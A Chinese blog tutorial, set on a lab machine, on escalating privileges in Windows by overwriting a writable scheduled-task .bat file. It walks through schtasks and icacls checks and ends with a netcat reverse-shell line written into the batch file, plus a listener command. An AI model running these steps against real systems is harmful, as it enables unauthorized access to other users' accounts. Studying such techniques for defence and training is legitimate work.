windows提权!

本文由探索者安全团队K1t0分享Windows提权方法。通过更改计划任务的.bat文件内容可实现横向和纵向提权。介绍了用schtasks查看计划任务,用icacls查看脚本文件权限,最后给出在靶机上写入反向连接shell并开启监听实现横向提权到指定用户的操作步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

阅读须知:

探索者安全团队技术文章仅供参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用本公众号所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者
本人负责,作者不为此承担任何责任,如有侵权烦请告知,我们会立即删除并致歉,创作不易转载请标明出处.感谢!

0T01介绍

今天由K1t0带领大家学一种windows提权的方法
个人理解windows计划任务有很多,如果我们能够更改计划任务的.bat 文件 将他修改成我们需要的内容例如一个nc 的 连接 就可以获取相应执行者权限,可以用来横向和纵向提权

0T02查看计划任务

schtasks 是windwos 的查看计划任务的工具

schtasks /query  /tn  计划任务名字 /fo list /v

/fo list /v  是详细列出计划任务并且详细表示!

例如我们查看到 名字为vulntask文件名字的计划任务如下的计划任务

从中可以知道运行的脚本 以及 作者 和 运行的用户 是谁
可以看到是taskusr1 那么我们就或许可以横向到 这个用户

0T03权限

首先看脚本文件的权限
icacls 文件
icacls C:\tasks\schtask.bat

可以看到我们有 F 读写执行完全的权限,只要有这个权限我们完全可以写入 反向连接shell
BUILTIN\Users:(I)(F):这表示内置用户组 “Users” 对该文件拥有读取和完全控制的权限。
NT AUTHORITY\SYSTEM:(I)(F):这表示系统用户拥有对该文件的读取和完全控制权限。
BUILTIN\Administrators:(I)(F):这表示内置管理员组拥有对该文件的读取和完全控制权限。
在这里,括号中的 (I) 代表 “继承”,(F) 代表 “完全控制”。

0T04 提权

在这个靶机上我们可以看到 已经存在nc

直接写入echo c:/tools/nc64.exe ip 端口 -e cmd.exe > C:\tasks\schtask.bat
然后开启监听 nc -nvlp 端口就可以横向提权到 taskusr1

非常感谢K1t0大师傅的精彩投稿,喜欢的小伙伴可以点点赞哦!


同时感兴趣的小伙伴可以多多关注我们团队哦!!!

pFcErm8.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值